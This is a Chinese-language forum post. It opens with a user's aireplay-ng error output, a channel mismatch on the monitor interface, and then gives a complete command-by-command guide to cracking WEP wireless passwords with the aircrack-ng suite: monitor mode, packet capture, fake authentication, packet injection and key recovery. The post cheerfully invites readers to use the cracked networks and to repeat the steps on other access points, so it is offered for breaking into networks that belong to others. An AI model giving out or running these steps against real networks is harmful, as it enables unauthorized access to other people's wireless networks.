ireplay-ng -1 0 -a aa:aa:aa:aa:aa:aa -h xx:xx:xx:xx:xx:xx mon0 12:22:14 Waiting for beacon frame (BSSID: 00:23:CD:6D:C3:16) on channel -1 12:22:14 mon0 is on channel -1, but the AP uses channel 6
执行第4步时就出了上述的问题了。。。
破解过程 :
先安装:yum install aircrack-ng
1、在终端中输入 sudo airmon-ng start wlan0 启动无线网卡的监控模式
wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看。
2、在终端中输入 sudo airodump-ng mon0 (特别说明:启动监控模式后无线网的端口现在是 mon0 )
看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端.
3、另开一个终端,输入 sudo airodump-ng --channel 6 --bssid AP's MAC -w wep mon0
-c后面跟着的6是要破解的AP工作频道,
--bissid后面跟着的AP's MAC是要欲破解AP的MAC地址,
-w后面跟着wep的是抓下来的数据包DATA保存的文件名,
具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名抓包。
4、再另开一个终端,输入 sudo aireplay-ng -1 0 -a AP's_MAC -h My_MAC mon0 与AP建立虚拟连接
-h后面跟着的My MAC是自己的无线网卡的MAC地址,
-1 fakeauth count 伪装客户端连接
5、建立虚拟连接成功后,输入 sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 进行注入,现在回头看下步骤3的终端是不是DATA在开始飞涨!
6、收集有5000个以上的DATA之后,另开一个终端,输入 sudo aircrack-ng wep*.cap 进行解密
如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多5000个之后就自动再运行,直到算出密码为至
7、破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。
现在可以冲浪去了,或者重复步聚1-7破解其它的AP 呵呵兄弟们冲浪时可别太猛了,不然把主人给冲翻了可就不好。